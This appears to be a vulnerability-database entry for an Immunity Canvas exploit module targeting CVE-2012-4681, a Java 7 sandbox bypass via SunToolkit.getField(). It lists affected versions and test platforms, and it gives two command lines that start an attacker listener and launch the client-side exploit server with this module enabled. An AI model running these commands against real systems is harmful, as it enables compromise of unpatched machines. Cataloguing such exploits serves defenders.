Immunity Canvas: JAVA_FORNAME_GETFIELD

2012-08-28T00:55:00
ID JAVA_FORNAME_GETFIELD
Type canvas
Reporter Immunity Canvas
Modified 2012-08-28T00:55:00

Description

Name| java_forName_getField
---|---
CVE| CVE-2012-4681
Exploit Pack| CANVAS
Description| Java forName/getField Method Invocation Sandbox Bypass
Notes| CVE Name: CVE-2012-4681
VENDOR: Sun
Notes:
There is a method invocation vulnerability involving sun.awt.SunToolkit.getField().
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager and escape the sandbox.

Affected versions
JDK and JRE 7 Update 6 and earlier

Note: this does not work under JRE 6 due to the getField() function not working correctly.

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 6
- Windows XP SP3 with JDK/JRE 7 and 7 update 6

Needs more testing (likely to work on other targets)

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_forName_getField -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://pastie.org/4594319
Date public: 07/26/2012